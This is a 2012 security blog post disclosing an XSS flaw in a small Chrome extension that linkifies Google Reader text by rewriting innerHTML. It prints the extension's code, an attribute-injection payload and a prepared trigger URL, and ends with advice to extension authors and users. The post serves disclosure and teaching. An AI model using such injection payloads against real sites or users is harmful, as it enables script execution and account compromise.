Tuesday, February 21, 2012

Chrome addons hacking: want XSS on google.com?

For a few days now I'm checking various Chrome extensions code looking for vulnerabilities (see also the first post of the series). There are many. Most of them due to lazy programming (ignoring even the Google docs on the subject), some are more subtle, coming from poor design decisions.

As for the risk impact though, there are catastrophic vulnerabilities. This is just a sample of what code is committed to Chrome Web Store and can be downloaded as a Google Chrome extension.

How would you like an XSS on google.com?

Chrome extensions can alter the contents of a webpage you're navigating (if they have the permission for the URL). In web security, what is the worst thing you might do when altering HTML document on-the-fly? Of course, XSS. Even if the page itself is totally safe from XSS, an addon might introduce it (it's similar to just entering javascript:code()in address bar) and the page cannot possibly defend from it (more or less).

Google documentation about Chrome extensions warns about this exact threat. But, as it turns out, seeing is believing, so there you go. Let me tell you about some minor extension (196 users as of now, which is the only reason why I'm 0daying now) that allowed me to XSS Google.

Meet Linkify

Linkify Code Review URLs for Google Reader is just what it says on the cover:
If you follow Chromium Code Reviews inside Google Reader, you do want the ability to click on a link. This extension is there for that. And just that.
It upgrades link-like texts for a certain domain in Google Reader site to <a>nchors. How does it do it?
// manifest.json
{
"update_url":"http://clients2.google.com/service/update2/crx",
   "name": "Linkify Code Review URLs for Google Reader™",
   "version": "1.0.0",
   "description": "Does what it says",
   "content_scripts": [ {
      "all_frames": true,
      "js": [ "ba-linkify.min.js", "jquery-1.6.2.min.js", "content.js" ],
      "matches": [ "https://www.google.com/reader/*" ],
      "run_at": "document_start"
   } ]
}
It attaches 3 JS files from extension code into any document from https://www.google.com/reader . The main logic in those files is: 
window.addEventListener('DOMNodeInserted', handleEvent, false);

function browseAndLinkify(node) {
  if (!node) {
    return;
  }
  if (node.children && node.children.length > 0) {
    $.each(node.children, function(index, element) {
      browseAndLinkify(element);
    });
  } else {
      if (node.innerHTML.indexOf('http://codereview.chromium.org/') > -1) {
        node.innerHTML = linkify(node.innerHTML);
     }
  }
}

function handleEvent(event) {
  browseAndLinkify(event.target);
}
So every node in the document, when its HTML contains 'http://codereview.chromium.org/', gets linkified (linkifying is converting http://anything to <a href="http://anything">anything</a>)and reinserted it into the DOM using innerHTML. Which smells like XSS.

Exploitation

Manipulating any node in Google Reader to start with http://codereview.chromium.org and having the XSS payload bypassing linkify engine is very simple. In Google Reader search box just start searching for:

http://codereview.chromium.org/"onmouseover="if(!window.a){alert(document.domain);window.a=1}//" ddd

and mouseover. Or, even better,  visit this handy URL (of course, with the extension installed):

https://www.google.com/reader/view/#search/http%3A%2F%2Fcodereview.chromium.org%2F%22onmouseover%3D%22if(!window.a)%7Balert(document.domain)%3Bwindow.a%3D1%7D%2F%2F%22%20ddd/

Voila! XSS on www.google.com

Lessons to take

Google Extension authors - don't use innerHTML with anything outside your control. Really!
Users - pay attention to what you're installing.
at